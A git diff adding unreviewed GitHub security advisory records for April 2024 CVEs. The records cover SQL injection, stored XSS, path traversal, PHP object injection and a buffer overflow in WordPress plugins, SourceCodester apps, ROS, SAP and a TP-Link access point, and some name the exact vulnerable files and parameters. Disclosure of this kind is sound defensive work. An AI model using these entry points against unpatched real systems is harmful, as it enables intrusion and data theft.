a/advisories/unreviewed/2024/04/GHSA-jfpx-r6jw-f765/GHSA-jfpx-r6jw-f765.json b/advisories/unreviewed/2024/04/GHSA-jfpx-r6jw-f765/GHSA-jfpx-r6jw-f765.json new file mode 100644 index 00000000000..bbfdba95770 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-jfpx-r6jw-f765/GHSA-jfpx-r6jw-f765.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jfpx-r6jw-f765", + "modified": "2024-04-07T18:30:29Z", + "published": "2024-04-07T18:30:29Z", + "aliases": [ + "CVE-2024-31234" + ], + "details": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Sizam REHub Framework.This issue affects REHub Framework: from n/a before 19.6.2.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-31234" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/rehub-framework/wordpress-rehub-framework-plugin-19-6-2-sql-injection-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-07T18:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-jfx7-45mm-rw3j/GHSA-jfx7-45mm-rw3j.json b/advisories/unreviewed/2024/04/GHSA-jfx7-45mm-rw3j/GHSA-jfx7-45mm-rw3j.json new file mode 100644 index 00000000000..d871f3d7a34 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-jfx7-45mm-rw3j/GHSA-jfx7-45mm-rw3j.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jfx7-45mm-rw3j", + "modified": "2024-04-09T21:32:00Z", + "published": "2024-04-09T21:32:00Z", + "aliases": [ + "CVE-2024-3053" + ], + "details": "The Forminator – Contact Form, Payment Form & Custom Form Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘id’ forminator_form shortcode attribute in versions up to, and including, 1.29.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3053" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3066927/forminator" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/19439622-6396-4f10-ab71-aa243b6812fa?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:39Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-jhv2-r46h-r3rr/GHSA-jhv2-r46h-r3rr.json b/advisories/unreviewed/2024/04/GHSA-jhv2-r46h-r3rr/GHSA-jhv2-r46h-r3rr.json new file mode 100644 index 00000000000..c55b1ec57d7 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-jhv2-r46h-r3rr/GHSA-jhv2-r46h-r3rr.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jhv2-r46h-r3rr", + "modified": "2024-04-10T15:30:38Z", + "published": "2024-04-10T15:30:38Z", + "aliases": [ + "CVE-2024-30723" + ], + "details": "An unauthorized node injection vulnerability has been identified in ROS Kinetic Kame in ROS_VERSION 1 and ROS_PYTHON_VERSION 3, allows remote attackers to escalate privileges and inject malicious ROS nodes into the system due to insecure permissions.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-30723" + }, + { + "type": "WEB", + "url": "https://github.com/yashpatelphd/CVE-2024-30723" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-10T03:15:06Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-jhv7-rhr9-5c2j/GHSA-jhv7-rhr9-5c2j.json b/advisories/unreviewed/2024/04/GHSA-jhv7-rhr9-5c2j/GHSA-jhv7-rhr9-5c2j.json new file mode 100644 index 00000000000..d1273200151 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-jhv7-rhr9-5c2j/GHSA-jhv7-rhr9-5c2j.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jhv7-rhr9-5c2j", + "modified": "2024-04-08T09:31:13Z", + "published": "2024-04-08T09:31:13Z", + "aliases": [ + "CVE-2023-52545" + ], + "details": "Vulnerability of undefined permissions in the Calendar app.\nImpact: Successful exploitation of this vulnerability will affect availability.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-52545" + }, + { + "type": "WEB", + "url": "https://consumer.huawei.com/en/support/bulletin/2024/3" + }, + { + "type": "WEB", + "url": "https://device.harmonyos.com/en/docs/security/update/security-bulletins-202403-0000001667644725" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T09:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-jjch-qg3j-855w/GHSA-jjch-qg3j-855w.json b/advisories/unreviewed/2024/04/GHSA-jjch-qg3j-855w/GHSA-jjch-qg3j-855w.json new file mode 100644 index 00000000000..f645672e5b3 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-jjch-qg3j-855w/GHSA-jjch-qg3j-855w.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jjch-qg3j-855w", + "modified": "2024-04-09T18:30:26Z", + "published": "2024-04-09T18:30:26Z", + "aliases": [ + "CVE-2024-26242" + ], + "details": "Windows Telephony Server Elevation of Privilege Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-26242" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26242" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-591" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:45Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-jjfv-x9mq-7m6v/GHSA-jjfv-x9mq-7m6v.json b/advisories/unreviewed/2024/04/GHSA-jjfv-x9mq-7m6v/GHSA-jjfv-x9mq-7m6v.json new file mode 100644 index 00000000000..84f6e54c892 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-jjfv-x9mq-7m6v/GHSA-jjfv-x9mq-7m6v.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jjfv-x9mq-7m6v", + "modified": "2024-04-05T18:30:35Z", + "published": "2024-04-05T18:30:35Z", + "aliases": [ + "CVE-2024-3351" + ], + "details": "A vulnerability, which was classified as critical, was found in SourceCodester Aplaya Beach Resort Online Reservation System 1.0. This affects an unknown part of the file admin/mod_roomtype/index.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-259455.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3351" + }, + { + "type": "WEB", + "url": "https://github.com/qqqyc/vlun1/blob/main/Aplaya-Beach-Resort-Online-Reservation-System-04" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.259455" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.259455" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.310219" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-05T18:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-jjrv-fcm6-q55q/GHSA-jjrv-fcm6-q55q.json b/advisories/unreviewed/2024/04/GHSA-jjrv-fcm6-q55q/GHSA-jjrv-fcm6-q55q.json new file mode 100644 index 00000000000..e58114ee288 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-jjrv-fcm6-q55q/GHSA-jjrv-fcm6-q55q.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jjrv-fcm6-q55q", + "modified": "2024-04-06T00:30:33Z", + "published": "2024-04-06T00:30:33Z", + "aliases": [ + "CVE-2024-3357" + ], + "details": "A vulnerability classified as problematic has been found in SourceCodester Aplaya Beach Resort Online Reservation System 1.0. This affects an unknown part of the file admin/mod_reports/index.php. The manipulation of the argument end leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-259461 was assigned to this vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3357" + }, + { + "type": "WEB", + "url": "https://github.com/qqqyc/vlun1/blob/main/Aplaya-Beach-Resort-Online-Reservation-System-11.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.259461" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.259461" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.310226" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-05T22:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-jpmf-chch-c98m/GHSA-jpmf-chch-c98m.json b/advisories/unreviewed/2024/04/GHSA-jpmf-chch-c98m/GHSA-jpmf-chch-c98m.json new file mode 100644 index 00000000000..d9aae9609ef --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-jpmf-chch-c98m/GHSA-jpmf-chch-c98m.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jpmf-chch-c98m", + "modified": "2024-04-09T03:30:52Z", + "published": "2024-04-09T03:30:52Z", + "aliases": [ + "CVE-2024-27901" + ], + "details": "SAP Asset Accounting could allow a high privileged attacker to exploit insufficient validation of path information provided by the users and pass it through to the file API's. Thus, causing a considerable impact on confidentiality, integrity and availability of the application.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-27901" + }, + { + "type": "WEB", + "url": "https://me.sap.com/notes/3438234" + }, + { + "type": "WEB", + "url": "https://support.sap.com/en/my-support/knowledge-base/security-notes-news.html?anchorId=section_370125364" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-35" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T01:15:48Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-jpmx-996v-48fm/GHSA-jpmx-996v-48fm.json b/advisories/unreviewed/2024/04/GHSA-jpmx-996v-48fm/GHSA-jpmx-996v-48fm.json new file mode 100644 index 00000000000..1ac37164deb --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-jpmx-996v-48fm/GHSA-jpmx-996v-48fm.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jpmx-996v-48fm", + "modified": "2024-04-10T15:30:37Z", + "published": "2024-04-10T15:30:37Z", + "aliases": [ + "CVE-2023-6236" + ], + "details": "A flaw was found in JBoss EAP. When an OIDC app that serves multiple tenants attempts to access the second tenant, it should prompt the user to log in again since the second tenant is secured with a different OIDC configuration. The underlying issue is in OidcSessionTokenStore when determining if a cached token should be used or not. This logic needs to be updated to take into account the new \"provider-url\" option in addition to the \"realm\" option.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6236" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/security/cve/CVE-2023-6236" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2250812" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-345" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-10T01:15:17Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-jqcw-7ccj-65rw/GHSA-jqcw-7ccj-65rw.json b/advisories/unreviewed/2024/04/GHSA-jqcw-7ccj-65rw/GHSA-jqcw-7ccj-65rw.json new file mode 100644 index 00000000000..8405515931a --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-jqcw-7ccj-65rw/GHSA-jqcw-7ccj-65rw.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jqcw-7ccj-65rw", + "modified": "2024-04-07T09:30:29Z", + "published": "2024-04-07T09:30:29Z", + "aliases": [ + "CVE-2024-30417" + ], + "details": "Path traversal vulnerability in the Bluetooth-based sharing module.\nImpact: Successful exploitation of this vulnerability may affect service confidentiality.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-30417" + }, + { + "type": "WEB", + "url": "https://consumer.huawei.com/en/support/bulletin/2024/4" + }, + { + "type": "WEB", + "url": "https://device.harmonyos.com/en/docs/security/update/security-bulletins-202404-0000001880501689" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-07T09:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-jrf6-frj2-w4m8/GHSA-jrf6-frj2-w4m8.json b/advisories/unreviewed/2024/04/GHSA-jrf6-frj2-w4m8/GHSA-jrf6-frj2-w4m8.json new file mode 100644 index 00000000000..01e3f863b53 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-jrf6-frj2-w4m8/GHSA-jrf6-frj2-w4m8.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jrf6-frj2-w4m8", + "modified": "2024-04-09T15:30:37Z", + "published": "2024-04-09T15:30:37Z", + "aliases": [ + "CVE-2023-49911" + ], + "details": "A stack-based buffer overflow vulnerability exists in the web interface Radio Scheduling functionality of Tp-Link AC1350 Wireless MU-MIMO Gigabit Access Point (EAP225 V3) v5.1.0 Build 20220926. A specially crafted series of HTTP requests can lead to remote code execution. An attacker can make an authenticated HTTP request to trigger this vulnerability.This vulnerability refers specifically to the overflow that occurs via the `band` parameter at offset `0x422420` of the `httpd` binary shipped with v5.0.4 Build 20220216 of the EAP115.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-49911" + }, + { + "type": "WEB", + "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1888" + }, + { + "type": "WEB", + "url": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2023-1888" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-121" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T15:15:30Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-jrgr-wxrg-4cj3/GHSA-jrgr-wxrg-4cj3.json b/advisories/unreviewed/2024/04/GHSA-jrgr-wxrg-4cj3/GHSA-jrgr-wxrg-4cj3.json new file mode 100644 index 00000000000..c213ff62308 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-jrgr-wxrg-4cj3/GHSA-jrgr-wxrg-4cj3.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jrgr-wxrg-4cj3", + "modified": "2024-04-08T15:30:34Z", + "published": "2024-04-08T15:30:34Z", + "aliases": [ + "CVE-2024-3440" + ], + "details": "A vulnerability was found in SourceCodester Prison Management System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /Admin/edit_profile.php. The manipulation leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-259693 was assigned to this vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3440" + }, + { + "type": "WEB", + "url": "https://github.com/fubxx/CVE/blob/main/PrisonManagementSystemSQL3.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.259693" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.259693" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.312207" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T14:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-jvcr-j6x4-hh24/GHSA-jvcr-j6x4-hh24.json b/advisories/unreviewed/2024/04/GHSA-jvcr-j6x4-hh24/GHSA-jvcr-j6x4-hh24.json new file mode 100644 index 00000000000..abaa6df2496 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-jvcr-j6x4-hh24/GHSA-jvcr-j6x4-hh24.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jvcr-j6x4-hh24", + "modified": "2024-04-09T18:30:27Z", + "published": "2024-04-09T18:30:27Z", + "aliases": [ + "CVE-2024-28933" + ], + "details": "Microsoft ODBC Driver for SQL Server Remote Code Execution Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28933" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-28933" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-191" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:54Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-jw4m-rwmx-c8ph/GHSA-jw4m-rwmx-c8ph.json b/advisories/unreviewed/2024/04/GHSA-jw4m-rwmx-c8ph/GHSA-jw4m-rwmx-c8ph.json new file mode 100644 index 00000000000..1059de5fbc5 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-jw4m-rwmx-c8ph/GHSA-jw4m-rwmx-c8ph.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jw4m-rwmx-c8ph", + "modified": "2024-04-09T15:30:36Z", + "published": "2024-04-09T15:30:36Z", + "aliases": [ + "CVE-2024-31544" + ], + "details": "A stored cross-site scripting (XSS) vulnerability in Computer Laboratory Management System v1.0 allows attackers to execute arbitrary JavaScript code by including malicious payloads into “remarks”, “borrower_name”, “faculty_department” parameters in /classes/Master.php?f=save_record.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-31544" + }, + { + "type": "WEB", + "url": "https://github.com/emirhanmtl/vuln-research/blob/main/Stored-XSS-Computer-Laboratory-Management-System-PoC.md" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T13:15:33Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-jwh4-5rh5-9844/GHSA-jwh4-5rh5-9844.json b/advisories/unreviewed/2024/04/GHSA-jwh4-5rh5-9844/GHSA-jwh4-5rh5-9844.json new file mode 100644 index 00000000000..ac93bbcb3b2 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-jwh4-5rh5-9844/GHSA-jwh4-5rh5-9844.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jwh4-5rh5-9844", + "modified": "2024-04-08T09:31:12Z", + "published": "2024-04-08T09:31:12Z", + "aliases": [ + "CVE-2024-30663" + ], + "details": "An issue was discovered in the default configurations of ROS (Robot Operating System) Melodic Morenia in ROS_VERSION 1 and ROS_PYTHON_VERSION 3. This vulnerability allows unauthenticated attackers to gain access using default credentials, posing a serious threat to the integrity and security of the system.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-30663" + }, + { + "type": "WEB", + "url": "https://github.com/yashpatelphd/CVE-2024-30663" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T07:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-jwwf-6j78-h8g4/GHSA-jwwf-6j78-h8g4.json b/advisories/unreviewed/2024/04/GHSA-jwwf-6j78-h8g4/GHSA-jwwf-6j78-h8g4.json new file mode 100644 index 00000000000..c2f95333234 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-jwwf-6j78-h8g4/GHSA-jwwf-6j78-h8g4.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jwwf-6j78-h8g4", + "modified": "2024-04-09T21:31:58Z", + "published": "2024-04-09T21:31:58Z", + "aliases": [ + "CVE-2024-1813" + ], + "details": "The Simple Job Board plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 2.11.0 via deserialization of untrusted input in the job_board_applicant_list_columns_value function. This makes it possible for unauthenticated attackers to inject a PHP Object. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code when a submitted job application is viewed.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1813" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3051715%40simple-job-board&old=3038476%40simple-job-board&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/89584034-4a93-42a6-8fef-55dc3895c45c?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:19Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-jx53-mj26-45vm/GHSA-jx53-mj26-45vm.json b/advisories/unreviewed/2024/04/GHSA-jx53-mj26-45vm/GHSA-jx53-mj26-45vm.json new file mode 100644 index 00000000000..61c9642e9e2 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-jx53-mj26-45vm/GHSA-jx53-mj26-45vm.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jx53-mj26-45vm", + "modified": "2024-04-09T21:31:58Z", + "published": "2024-04-09T21:31:58Z", + "aliases": [ + "CVE-2024-1466" + ], + "details": "The Elementor Addons by Livemesh plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘slider_style’ attribute of the Posts Multislider widget in all versions up to, and including, 8.3.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. CVE-2024-27986 may be a duplicate of this issue.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1466" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3048237/addons-for-elementor" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/604975b9-fe2f-4d8f-af13-995f08d72e8f?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:18Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-jx7f-v5r5-55j4/GHSA-jx7f-v5r5-55j4.json b/advisories/unreviewed/2024/04/GHSA-jx7f-v5r5-55j4/GHSA-jx7f-v5r5-55j4.json new file mode 100644 index 00000000000..ac2f00ebf27 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-jx7f-v5r5-55j4/GHSA-jx7f-v5r5-55j4.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jx7f-v5r5-55j4", + "modified": "2024-04-08T00:30:46Z", + "published": "2024-04-08T00:30:46Z", + "aliases": [ + "CVE-2020-36829" + ], + "details": "The Mojolicious module before 8.65 for Perl is vulnerable to secure_compare timing attacks that allow an attacker to guess the length of a secret string. Only versions after 1.74 are affected.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-36829" + }, + { + "type": "WEB", + "url": "https://github.com/mojolicious/mojo/issues/1599" + }, + { + "type": "WEB", + "url": "https://github.com/mojolicious/mojo/pull/1601" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T00:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-jx9r-9m63-c2rc/GHSA-jx9r-9m63-c2rc.json b/advisories/unreviewed/2024/04/GHSA-jx9r-9m63-c2rc/GHSA-jx9r-9m63-c2rc.json new file mode 100644 index 00000000000..b00ce819d9b --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-jx9r-9m63-c2rc/GHSA-jx9r-9m63-c2rc.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jx9r-9m63-c2rc", + "modified": "2024-04-09T21:31:56Z", + "published": "2024-04-09T21:31:56Z", + "aliases": [ + "CVE-2023-6799" + ], + "details": "The WP Reset – Most Advanced WordPress Reset Tool plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.99 via the use of insufficiently random snapshot names. This makes it possible for unauthenticated attackers to extract sensitive data including site backups by brute-forcing the snapshot filenames.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6799" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?old_path=/wp-reset/tags/1.99&old=3059287&new_path=/wp-reset/tags/2.0&new=3059287&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/68f41e88-ed36-4361-bddd-41495a540cd9?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:12Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-jx9x-jrf9-63v4/GHSA-jx9x-jrf9-63v4.json b/advisories/unreviewed/2024/04/GHSA-jx9x-jrf9-63v4/GHSA-jx9x-jrf9-63v4.json new file mode 100644 index 00000000000..3a1f7846ce7 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-jx9x-jrf9-63v4/GHSA-jx9x-jrf9-63v4.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jx9x-jrf9-63v4", + "modified": 